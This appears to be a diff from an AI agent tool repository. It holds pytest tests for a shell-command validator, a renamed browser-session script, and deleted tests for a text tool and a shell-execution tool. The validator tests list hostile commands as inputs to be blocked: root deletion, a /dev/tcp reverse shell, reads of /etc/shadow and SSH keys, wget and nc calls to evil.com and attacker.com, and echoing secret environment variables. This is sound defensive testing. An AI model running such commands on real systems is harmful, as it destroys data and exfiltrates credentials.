            "bash -c 'echo hacked'",
            "sh -c 'rm -rf /'",
            "powershell -Command Get-Process",
            "pwsh -c 'ls'",
            "cmd /c dir",
            # cmd.exe exercises the .exe-suffix normalization.
            "cmd.exe /c dir",
        ],
    )
    def test_blocked_executable(self, cmd):
        """Should raise CommandBlockedError for dangerous executables."""
        with pytest.raises(CommandBlockedError):
            validate_command(cmd)
class TestBlockedPatterns:
    """Commands matching dangerous content patterns must be rejected."""

    DANGEROUS_PATTERN_COMMANDS = (
        # Recursive delete of root / home
        "rm -rf /",
        "rm -rf ~",
        "rm -rf ..",
        "rm -rf C:\\",
        "rm -f -r /",
        # sudo
        "sudo apt install something",
        "sudo rm -rf /var/log",
        # Reverse shell indicators
        "bash -i >& /dev/tcp/10.0.0.1/4444",
        # Credential theft
        "cat ~/.ssh/id_rsa",
        "cat /etc/shadow",
        "cat something/credential_key",
        "type something\\credential_key",
        # Command substitution with dangerous tools
        "echo `wget http://evil.com`",
        # Environment variable exfiltration
        "echo $API_KEY",
        "echo ${SECRET_TOKEN}",
    )

    @pytest.mark.parametrize("cmd", DANGEROUS_PATTERN_COMMANDS)
    def test_blocked_pattern(self, cmd):
        """Each dangerous pattern raises CommandBlockedError."""
        with pytest.raises(CommandBlockedError):
            validate_command(cmd)
class TestChainedCommands:
    """A dangerous command hidden behind &&, ||, | or ; is still caught."""

    COMPOUND_COMMANDS = (
        "echo hi && wget http://evil.com/payload",
        "echo hi || ssh attacker@remote",
        "ls | nc attacker.com 4444",
        "echo safe; bash -c 'evil stuff'",
        "git status; shutdown /s /t 0",
    )

    @pytest.mark.parametrize("cmd", COMPOUND_COMMANDS)
    def test_chained_dangerous_command(self, cmd):
        """Chaining with safe commands does not launder a dangerous one."""
        with pytest.raises(CommandBlockedError):
            validate_command(cmd)
class TestEdgeCases:
    """Bypass attempts and boundary behaviour of the validator."""

    ABSOLUTE_PATH_INVOCATIONS = (
        "/usr/bin/wget https://attacker.com",
        "C:\\Windows\\System32\\cmd.exe /c dir",
    )

    def test_env_var_prefix_does_not_bypass(self):
        """An env-var assignment prefix (FOO=bar wget ...) must not hide the binary."""
        with pytest.raises(CommandBlockedError):
            validate_command("FOO=bar wget http://evil.com")

    @pytest.mark.parametrize("cmd", ABSOLUTE_PATH_INVOCATIONS)
    def test_directory_prefix_does_not_bypass(self, cmd):
        """Fully-qualified paths to blocked executables are still matched."""
        with pytest.raises(CommandBlockedError):
            validate_command(cmd)

    def test_case_insensitive_blocking(self):
        """Mixed-case executable names are matched case-insensitively."""
        with pytest.raises(CommandBlockedError):
            validate_command("Wget http://evil.com")

    def test_exe_suffix_stripped(self):
        """A trailing .exe does not exempt an otherwise blocked binary."""
        with pytest.raises(CommandBlockedError):
            validate_command("cmd.exe /c dir")

    def test_safe_rm_without_dangerous_target(self):
        """Deleting ordinary files is allowed; only root/home targets are blocked."""
        for cmd in ("rm temp.txt", "rm -f output.log"):
            validate_command(cmd)

    def test_python_commands_are_safe(self):
        """Interpreter one-liners (python -c / node -e) remain available."""
        for cmd in (
            "python script.py",
            "python -m pytest tests/",
            "python3 -c 'print(1)'",
            "python -c 'import json; print(json.dumps({}))'",
            "node -e 'console.log(1)'",
        ):
            validate_command(cmd)

    def test_error_message_is_descriptive(self):
        """The raised error explains why the command was rejected."""
        with pytest.raises(CommandBlockedError, match="blocked for safety"):
            validate_command("wget http://evil.com")
+6 -4
View File
@@ -56,10 +56,12 @@ async def reproduce_agent_session(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1 (seq 1-2): browser_start ──────────────────────────────────
# ── Turn 1 (seq 1-2): session start ──────────────────────────────────
# Original 2026-02 transcript called the now-deleted browser_start MCP
# tool here; cold-start is now folded into browser_open via lazy-start.
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
# ── Turn 2 (seq 3-4): browser_open ───────────────────────────────────
t0 = time.time()
@@ -235,10 +237,10 @@ async def demonstrate_correct_approach(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1: browser_start ────────────────────────────────────────────
# ── Turn 1: session start ────────────────────────────────────────────
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}", time.time() - t0)
# ── Turn 2: browser_open + browser_wait for SPA ──────────────────────
t0 = time.time()
-126
View File
@@ -1,126 +0,0 @@
"""Tests for example_tool - A simple text processing tool."""
import pytest
from fastmcp import FastMCP
from aden_tools.tools.example_tool.example_tool import register_tools
@pytest.fixture
def example_tool_fn(mcp: FastMCP):
    """Register example_tool on the server and hand back its raw function."""
    register_tools(mcp)
    registry = mcp._tool_manager._tools
    return registry["example_tool"].fn
class TestExampleTool:
    """Behavioural tests for the example_tool text-processing function."""

    def test_valid_message(self, example_tool_fn):
        """A plain message is echoed back untouched."""
        assert example_tool_fn(message="Hello, World!") == "Hello, World!"

    def test_uppercase_true(self, example_tool_fn):
        """uppercase=True upper-cases the whole message."""
        assert example_tool_fn(message="hello", uppercase=True) == "HELLO"

    def test_uppercase_false(self, example_tool_fn):
        """uppercase=False (the default) leaves casing alone."""
        assert example_tool_fn(message="Hello", uppercase=False) == "Hello"

    def test_repeat_multiple(self, example_tool_fn):
        """repeat=3 produces the message three times, space-separated."""
        assert example_tool_fn(message="Hi", repeat=3) == "Hi Hi Hi"

    def test_repeat_default(self, example_tool_fn):
        """repeat=1 (the default) yields a single copy."""
        assert example_tool_fn(message="Hello", repeat=1) == "Hello"

    def test_uppercase_and_repeat_combined(self, example_tool_fn):
        """uppercase and repeat compose."""
        assert example_tool_fn(message="hi", uppercase=True, repeat=2) == "HI HI"

    def test_empty_message_error(self, example_tool_fn):
        """An empty message is rejected with the 1-1000 length hint."""
        out = example_tool_fn(message="")
        assert "Error" in out
        assert "1-1000" in out

    def test_message_too_long_error(self, example_tool_fn):
        """1001 characters is over the limit and rejected."""
        out = example_tool_fn(message="x" * 1001)
        assert "Error" in out
        assert "1-1000" in out

    def test_message_at_max_length(self, example_tool_fn):
        """Exactly 1000 characters is still accepted."""
        boundary = "x" * 1000
        assert example_tool_fn(message=boundary) == boundary

    def test_repeat_zero_error(self, example_tool_fn):
        """repeat=0 is below the allowed 1-10 range."""
        out = example_tool_fn(message="Hi", repeat=0)
        assert "Error" in out
        assert "1-10" in out

    def test_repeat_eleven_error(self, example_tool_fn):
        """repeat=11 is above the allowed 1-10 range."""
        out = example_tool_fn(message="Hi", repeat=11)
        assert "Error" in out
        assert "1-10" in out

    def test_repeat_at_max(self, example_tool_fn):
        """repeat=10, the ceiling, is accepted."""
        assert example_tool_fn(message="Hi", repeat=10) == " ".join(["Hi"] * 10)

    def test_repeat_negative_error(self, example_tool_fn):
        """Negative repeat counts are rejected."""
        out = example_tool_fn(message="Hi", repeat=-1)
        assert "Error" in out
        assert "1-10" in out

    def test_whitespace_only_message(self, example_tool_fn):
        """A lone space is non-empty and therefore valid."""
        assert example_tool_fn(message=" ") == " "

    def test_special_characters_in_message(self, example_tool_fn):
        """Punctuation and symbols pass through unchanged."""
        assert example_tool_fn(message="Hello! @#$%^&*()") == "Hello! @#$%^&*()"

    def test_unicode_message(self, example_tool_fn):
        """Non-ASCII text (CJK, emoji) round-trips intact."""
        assert example_tool_fn(message="Hello 世界 🌍") == "Hello 世界 🌍"

    def test_unicode_uppercase(self, example_tool_fn):
        """Upper-casing handles accented characters."""
        assert example_tool_fn(message="café", uppercase=True) == "CAFÉ"
@@ -1,226 +0,0 @@
"""Tests for the remaining file_system_toolkits — execute_command_tool only.
The file tools (read_file, write_file, edit_file, hashline_edit, search_files,
apply_patch) all live in aden_tools.file_ops and are tested in test_file_ops.py.
"""
import asyncio
import os
import sys
from unittest.mock import patch
import pytest
from fastmcp import FastMCP
@pytest.fixture
def mcp():
    """Provide a fresh FastMCP server for each test."""
    server = FastMCP("test-server")
    return server
@pytest.fixture
def mock_workspace():
    """Keyword arguments identifying the calling agent for the shell tool."""
    return dict(agent_id="test-agent")
@pytest.fixture
def mock_secure_path(tmp_path):
    """Redirect the shell tool's sandbox resolution into pytest's tmp_path."""
    module = "aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool"

    def _resolve(path, agent_id):
        # Every sandboxed path lands under the test's temporary directory.
        return os.path.join(tmp_path, path)

    with (
        patch(f"{module}.get_sandboxed_path", side_effect=_resolve),
        patch(f"{module}.AGENT_SANDBOXES_DIR", str(tmp_path)),
    ):
        yield
class TestExecuteCommandTool:
"""Tests for execute_command_tool."""
@pytest.fixture
def execute_command_fn(self, mcp):
    """Register the shell toolkit and return the raw execute_command_tool callable."""
    from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools

    register_tools(mcp)
    registry = mcp._tool_manager._tools
    return registry["execute_command_tool"].fn
async def test_execute_simple_command(self, execute_command_fn, mock_workspace, mock_secure_path):
    """echo runs successfully and its stdout is captured."""
    outcome = await execute_command_fn(command="echo 'Hello World'", **mock_workspace)
    assert outcome["success"] is True
    assert outcome["return_code"] == 0
    assert "Hello World" in outcome["stdout"]
async def test_execute_failing_command(self, execute_command_fn, mock_workspace, mock_secure_path):
    """A non-zero exit is reported via return_code, not as a tool failure."""
    outcome = await execute_command_fn(command="exit 1", **mock_workspace)
    assert outcome["success"] is True
    assert outcome["return_code"] == 1
async def test_execute_command_with_stderr(self, execute_command_fn, mock_workspace, mock_secure_path):
    """stderr output is captured separately from stdout."""
    outcome = await execute_command_fn(command="echo 'error message' >&2", **mock_workspace)
    assert outcome["success"] is True
    assert "error message" in outcome.get("stderr", "")
async def test_execute_command_list_files(self, execute_command_fn, mock_workspace, mock_secure_path, tmp_path):
    """ls sees a file created on disk before the call."""
    (tmp_path / "testfile.txt").write_text("content", encoding="utf-8")
    outcome = await execute_command_fn(command=f"ls {tmp_path}", **mock_workspace)
    assert outcome["success"] is True
    assert outcome["return_code"] == 0
    assert "testfile.txt" in outcome["stdout"]
async def test_execute_command_with_pipe(self, execute_command_fn, mock_workspace, mock_secure_path):
    """Shell pipelines are supported end to end."""
    outcome = await execute_command_fn(command="echo 'hello world' | tr 'a-z' 'A-Z'", **mock_workspace)
    assert outcome["success"] is True
    assert outcome["return_code"] == 0
    assert "HELLO WORLD" in outcome["stdout"]
@pytest.fixture
def bash_output_fn(self, mcp):
    """Register the shell toolkit and return the raw bash_output callable."""
    from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools

    register_tools(mcp)
    registry = mcp._tool_manager._tools
    return registry["bash_output"].fn
@pytest.fixture
def bash_kill_fn(self, mcp):
    """Register the shell toolkit and return the raw bash_kill callable."""
    from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools

    register_tools(mcp)
    registry = mcp._tool_manager._tools
    return registry["bash_kill"].fn
async def test_per_call_timeout_overrides_default(self, execute_command_fn, mock_workspace, mock_secure_path):
    """A timeout_seconds below the default kills the command early."""
    import time

    started = time.monotonic()
    outcome = await execute_command_fn(
        command="sleep 10",
        timeout_seconds=1,
        **mock_workspace,
    )
    elapsed = time.monotonic() - started
    assert outcome.get("timed_out") is True
    assert "1 seconds" in outcome.get("error", "")
    assert elapsed < 5, f"timeout did not kill the command promptly ({elapsed:.2f}s)"
async def test_timeout_is_clamped_upwards(self, execute_command_fn, mock_workspace, mock_secure_path):
    """A timeout above the 600s ceiling is clamped rather than rejected."""
    outcome = await execute_command_fn(
        command="echo fast",
        timeout_seconds=99999,
        **mock_workspace,
    )
    assert outcome["success"] is True
    assert "fast" in outcome["stdout"]
async def test_event_loop_unblocked_while_command_runs(self, execute_command_fn, mock_workspace, mock_secure_path):
    """Other asyncio tasks keep running while the subprocess executes."""
    ticks = 0

    async def ticker():
        nonlocal ticks
        for _ in range(20):
            await asyncio.sleep(0.05)
            ticks += 1

    background = asyncio.create_task(ticker())
    outcome = await execute_command_fn(command="sleep 0.5", **mock_workspace)
    await background
    assert outcome["success"] is True
    assert ticks >= 5, f"event loop looked blocked during subprocess (only {ticks} ticks in 1s)"
async def test_background_job_start_poll_and_complete(
    self,
    execute_command_fn,
    bash_output_fn,
    mock_workspace,
    mock_secure_path,
):
    """A run_in_background job can be started, polled, and reports its exit status.

    Starts a short three-line Python script in the background, then polls
    bash_output until the job reports an exited status (or 5s elapse),
    accumulating streamed stdout across polls.
    """
    py_script = (
        "import time,sys;"
        "print('one');sys.stdout.flush();time.sleep(0.1);"
        "print('two');sys.stdout.flush();time.sleep(0.1);"
        "print('three')"
    )
    start_result = await execute_command_fn(
        command=f'"{sys.executable}" -c "{py_script}"',
        run_in_background=True,
        **mock_workspace,
    )
    assert start_result["background"] is True
    job_id = start_result["id"]
    # get_running_loop() is the correct API inside a coroutine —
    # asyncio.get_event_loop() here has been deprecated since Python 3.10.
    # Hoisting the loop handle also avoids a lookup per poll iteration.
    loop = asyncio.get_running_loop()
    deadline = loop.time() + 5.0
    seen_text = ""
    while loop.time() < deadline:
        poll = await bash_output_fn(id=job_id, **mock_workspace)
        seen_text += poll["stdout"]
        if poll["status"].startswith("exited"):
            break
        await asyncio.sleep(0.05)
    # Output may arrive across several polls; all three lines must show up.
    assert "one" in seen_text
    assert "two" in seen_text
    assert "three" in seen_text
    assert poll["status"] == "exited(0)"
async def test_background_job_kill(
    self,
    execute_command_fn,
    bash_output_fn,
    bash_kill_fn,
    mock_workspace,
    mock_secure_path,
):
    """bash_kill terminates a long-running background job and frees its id."""
    started = await execute_command_fn(
        command="sleep 30",
        run_in_background=True,
        **mock_workspace,
    )
    job_id = started["id"]
    killed = await bash_kill_fn(id=job_id, **mock_workspace)
    assert killed["id"] == job_id
    assert "terminated" in killed["status"] or "killed" in killed["status"]
    followup = await bash_output_fn(id=job_id, **mock_workspace)
    assert "no background job" in followup.get("error", "")
async def test_bash_output_isolated_across_agents(self, execute_command_fn, bash_output_fn, mock_secure_path):
    """A job id created by agent A is invisible to agent B."""
    from aden_tools.tools.file_system_toolkits.execute_command_tool import background_jobs

    started = await execute_command_fn(
        command="sleep 5",
        run_in_background=True,
        agent_id="agent-A",
    )
    other_agent_poll = await bash_output_fn(id=started["id"], agent_id="agent-B")
    assert "no background job" in other_agent_poll.get("error", "")
    # Clean up agent A's still-running job so it doesn't outlive the test.
    await background_jobs.clear_agent("agent-A")